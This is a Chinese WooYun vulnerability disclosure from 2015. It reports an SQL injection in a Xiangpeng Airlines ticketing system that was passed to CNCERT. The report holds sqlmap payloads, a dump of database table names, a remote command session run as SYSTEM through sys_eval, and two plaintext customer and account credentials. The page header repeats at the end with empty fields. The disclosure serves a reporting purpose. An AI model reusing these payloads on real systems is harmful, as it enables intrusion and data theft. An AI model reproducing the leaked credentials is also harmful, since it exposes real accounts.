祥鹏航空某系统SQL注入(可--sql-shell执行命令)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155558

漏洞标题：祥鹏航空某系统SQL注入(可--sql-shell执行命令)

漏洞作者： Ysql404

提交时间：2015-11-24 19:06

修复时间：2016-01-11 16:42

公开时间：2016-01-11 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-24：细节已通知厂商并且等待厂商处理中
2015-11-27：厂商已经确认，细节仅向厂商公开
2015-12-07：细节向核心白帽子及相关领域专家公开
2015-12-17：细节向普通白帽子公开
2015-12-27：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

祥鹏航空某系统SQL注入

详细说明：

http://**.**.**.**/web/Help.aspx?code=Private 注入参数：code

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=Private' AND 8659=8659 AND 'vmjH'='vmjH
    Type: UNION query
    Title: MySQL UNION query (NULL) - 13 columns
    Payload: code=-2518' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162717371,0x5452704744716a5a6b64,0x7165796471),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: code=Private'; SELECT SLEEP(5)-- 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: code=Private' AND SLEEP(5) AND 'oGRy'='oGRy
---
[15:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5
[15:52:34] [INFO] testing if current user is DBA
[15:52:34] [INFO] fetching current user
current user is DBA:    True

Database: ticketdb
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| npc_sys_action_log                                 | 8062    |
| shop_commodity_price                               | 2556    |
| shop_order_item                                    | 2048    |
| shop_address                                       | 1477    |
| shop_order                                         | 1210    |
| npc_sys_action_detail                              | 978     |
| shop_commodity                                     | 874     |
| shop_commodity_detail                              | 603     |
| npc_sys_authorization                              | 320     |
| shop_packages                                      | 305     |
| npc_sys_member_data                                | 189     |
| npc_sys_member_info                                | 175     |
| shop_cart                                          | 144     |
| npc_dict_item                                      | 102     |
| npc_sys_menu                                       | 35      |
| npc_sys_user_data                                  | 23      |
| npc_sys_user_info                                  | 22      |
| npc_sys_config                                     | 11      |
| npc_dict_group                                     | 10      |
| npc_info_group                                     | 8       |
| npc_sys_link_user_role                             | 8       |
| npc_info_content_page                              | 7       |
| shop_category                                      | 5       |
| npc_sys_role_info                                  | 3       |
| info_adv                                           | 2       |
+----------------------------------------------------+---------+
Database: performance_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| events_waits_summary_by_thread_by_event_name       | 5520    |
| events_statements_summary_by_thread_by_event_name  | 3300    |
| events_stages_summary_by_thread_by_event_name      | 2160    |
| events_statements_summary_by_digest                | 1311    |
| events_waits_summary_by_account_by_event_name      | 552     |
| events_waits_summary_by_host_by_event_name         | 552     |
| events_waits_summary_by_user_by_event_name         | 552     |
| setup_instruments                                  | 552     |
| events_statements_summary_by_account_by_event_name | 330     |
| events_statements_summary_by_host_by_event_name    | 330     |
| events_statements_summary_by_user_by_event_name    | 330     |
| events_waits_summary_global_by_event_name          | 276     |
| events_stages_summary_by_account_by_event_name     | 216     |
| events_stages_summary_by_host_by_event_name        | 216     |
| events_stages_summary_by_user_by_event_name        | 216     |
| table_io_waits_summary_by_index_usage              | 185     |
| events_waits_summary_by_instance                   | 180     |
| file_instances                                     | 180     |
| events_statements_summary_global_by_event_name     | 165     |
| file_summary_by_instance                           | 151     |
| objects_summary_global_by_type                     | 124     |
| table_io_waits_summary_by_table                    | 124     |
| table_lock_waits_summary_by_table                  | 124     |
| events_stages_summary_global_by_event_name         | 108     |
| file_summary_by_event_name                         | 42      |
| threads                                            | 20      |
| setup_consumers                                    | 12      |
| session_account_connect_attrs                      | 8       |
| session_connect_attrs                              | 8       |
| performance_timers                                 | 5       |
| setup_objects                                      | 4       |
| setup_timers                                       | 4       |
| socket_summary_by_event_name                       | 3       |
| accounts                                           | 2       |
| hosts                                              | 2       |
| users                                              | 2       |
| events_statements_current                          | 1       |
| setup_actors                                       | 1       |
+----------------------------------------------------+---------+

管理用户、普通用户密码都为明文

登录其中2个
18687818813/pm110110

行游网帐户，里面有许多订单 xyw123/xyw36369

该系统可进行UDF提权操作，因为3389未开放未继续进行；

漏洞证明：

web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5
[16:40:07] [INFO] testing if current user is DBA
[16:40:07] [INFO] fetching current user
current user is DBA:    True
[16:40:07] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> sys_eval('whoami')
[16:40:10] [INFO] fetching SQL query output: 'sys_eval('whoami')'
sys_eval('whoami'):    'nt authority\\system'
sql-shell> sys_eval('ipconfig')
[16:40:13] [INFO] fetching SQL query output: 'sys_eval('ipconfig')'
[16:40:13] [WARNING] possible server trimmed output detected (probably due to its length and/or content): \r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter \r\n\t
[16:40:13] [INFO] retrieving the length of query output
[16:40:13] [INFO] retrieved: 355
[16:40:28] [INFO] resuming partial value: \r\nWi
[16:41:20] [INFO] retrieved: ..      Ethernet adapter \?b1\?be______.. 49/351 (1[16:41:20] [INFO] retrieved: ..     Ethernet adapter \?b1\?be______:.. 50/351 (1[16:41:24] [INFO] retrieved: ..     Ethernet adapter \?b1\?be__\?c1___:.. 51/351[16:41:24] [INFO] retrieved: ..     Ethernet adapter \?b1\?be_\?d8\?c1___:.. 52/[16:41:24] [INFO] retrieved: ..    Ethernet adapter \?b1\?be_\?d8\?c1___: .. 53/[16:41:25] [INFO] retrieved: ..   Ethernet adapter \?b1\?be_\?d8\?c1___:  .. 54/[16:41:26] [INFO] retrieved: ..   Ethernet adapter \?b1\?be\?b5\?d8\?c1___:  .. [16:41:26] [INFO] retrieved: ..   Ethernet adapter \?b1\?be\?b5\?d8\?c1__\?d3:  [16:41:27] [INFO] retrieved: ..   Ethernet adapter \?b1\?be\?b5\?d8\?c1_\?bd\?d3[16:41:28] [INFO] retrieved: ..  Ethernet adapter \?b1\?be\?b5\?d8\?c1_\?bd\?d3:[16:41:28] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1_\?bd\?d3: [16:41:30] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d[16:41:30] [INFO] retrieved: ..Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3[16:41:31] [INFO] retrieved: ..hernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3: [16:41:32] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:    [16:41:33] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:    [16:41:33] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:    [16:41:33] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:    [16:41:33] [INFO] retrieved: ..et adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:     [16:41:34] [INFO] retrieved: ..t adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:      [16:41:34] [INFO] retrieved: .. adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       [16:41:36] [INFO] retrieved: ..adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       C[16:41:37] [INFO] retrieved: ..dapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Co[16:41:38] [INFO] retrieved: ..apter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Con[16:41:40] [INFO] retrieved: ..ter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Conne[16:41:40] [INFO] retrieved: ..ter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Conne[16:41:40] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Connect[16:41:41] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Connectio[16:41:41] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Connectio[16:41:41] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Connectio[16:41:42] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Connection-[16:41:44] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Connection-[16:41:44] [INFO] retrieved: ..b5\?d8\?c1\?ac\?bd\?d3:       Connection-specific[16:41:45] [INFO] retrieved: ..b5\?d8\?c1\?ac\?bd\?d3:       Connection-specific[16:41:46] [INFO] retrieved: ..c1\?ac\?bd\?d3:       Connection-specific D.. 83/[16:41:47] [INFO] retrieved: ..bd\?d3:       Connection-specific D_S.. 84/351 (2[16:41:47] [INFO] retrieved: ..bd\?d3:       Connection-specific D_S.. 85/351 (2[16:43:52] [INFO] retrieved: ..54    Ethernet adapter _\?be______.. 281/351 (80%[16:43:53] [INFO] retrieved: ..4    Ethernet adapter _\?be______ .. 282/351 (80%[16:43:53] [INFO] retrieved: ..    Ethernet adapter _\?be______ 2.. 283/351 (81%[16:43:53] [INFO] retrieved: ..    Ethernet adapter _\?be\?b5_____ 2.. 284/351 ([16:43:53] [INFO] retrieved: ..    Ethernet adapter \?b1\?be\?b5_____ 2.. 285/35[16:43:55] [INFO] retrieved: ..    Ethernet adapter \?b1\?be\?b5___\?bd_ 2.. 286[16:43:55] [INFO] retrieved: ..    Ethernet adapter \?b1\?be\?b5\?d8__\?bd_ 2.. [16:43:56] [INFO] retrieved: ..    Ethernet adapter \?b1\?be\?b5\?d8_\?ac\?bd_ 2[16:43:56] [INFO] retrieved: ..    Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd[16:43:58] [INFO] retrieved: ..    Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd[16:43:59] [INFO] retrieved: ..   Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\[16:44:00] [INFO] retrieved: ..  Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?[16:44:00] [INFO] retrieved: .. Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d[16:44:00] [INFO] retrieved: ..Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3[16:44:01] [INFO] retrieved: ..ernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:[16:44:01] [INFO] retrieved: ..ernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:[16:44:01] [INFO] retrieved: ..ernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:[16:44:01] [INFO] retrieved: ..rnet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2: [16:44:01] [INFO] retrieved: ..net adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:  [16:44:02] [INFO] retrieved: ..et adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:   [16:44:04] [INFO] retrieved: ..t adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:    [16:44:05] [INFO] retrieved: .. adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:     [16:44:05] [INFO] retrieved: ..adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:      [16:44:05] [INFO] retrieved: ..dapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       [16:44:05] [INFO] retrieved: ..apter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       M[16:44:06] [INFO] retrieved: ..pter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Me[16:44:06] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media[16:44:06] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media[16:44:06] [INFO] retrieved: ..r \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media[16:44:07] [INFO] retrieved: .. \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media [16:44:09] [INFO] retrieved: ..\?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media S[16:44:09] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media Sta[16:44:09] [INFO] retrieved: ..b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media Sta[16:44:09] [INFO] retrieved: ..be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media State .[16:44:09] [INFO] retrieved: ..b5\?d8\?c1\?ac\?bd\?d3 2:       Media State . . .[16:44:10] [INFO] retrieved: ..c1\?ac\?bd\?d3 2:       Media State . . . ... 316[16:44:11] [INFO] retrieved: ..c1\?ac\?bd\?d3 2:       Media State . . . ... 317[16:44:11] [INFO] retrieved: ..ac\?bd\?d3 2:       Media State . . . . .. 318/35[16:44:12] [INFO] retrieved: ..bd\?d3 2:       Media State . . . . ... 319/351 ([16:44:13] [INFO] retrieved: ..d3 2:       Media State . . . . . .. 320/351 (91%[16:44:28] [INFO] retrieved:   Windows IP Configuration      Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3:       Connection-specific DNS Suffix  . :      IP Address. . . . . . . . . . . . : **.**.**.**     Subnet Mask . . . . . . . . . . . : **.**.**.**     Default Gateway . . . . . . . . . : **.**.**.**    Ethernet adapter \?b1\?be\?b5\?d8\?c1\?ac\?bd\?d3 2:       Media State . . . . . . . . . . . : Media disconnected 
sys_eval('ipconfig'):    '\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter \\?b1\\?be\\?b5\\?d8\\?c1\\?ac\\?bd\\?d3:\r\n\r\n   Connection-specific DNS Suffix  . : \r\n   IP Address. . . . . . . . . . . . : **.**.**.**\r\n   Subnet Mask . . . . . . . . . . . : **.**.**.**\r\n   Default Gateway . . . . . . . . . : **.**.**.**\r\n\r\nEthernet adapter \\?b1\\?be\\?b5\\?d8\\?c1\\?ac\\?bd\\?d3 2:\r\n\r\n   Media State . . . . . . . . . . . : Media disconnected\r'

修复方案：

过滤

版权声明：转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-11-27 16:40

厂商回复：

CNVD未直接复现所述情况，已经转由CNCERT下发给云南分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155558

漏洞标题：祥鹏航空某系统SQL注入(可--sql-shell执行命令)

相关厂商：祥鹏航空

漏洞作者： Ysql404

提交时间：2015-11-24 19:06

修复时间：2016-01-11 16:42

公开时间：2016-01-11 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155558

漏洞标题：祥鹏航空某系统SQL注入(可--sql-shell执行命令)

相关厂商：祥鹏航空

漏洞作者： Ysql404

提交时间：2015-11-24 19:06

修复时间：2016-01-11 16:42

公开时间：2016-01-11 16:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155558"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：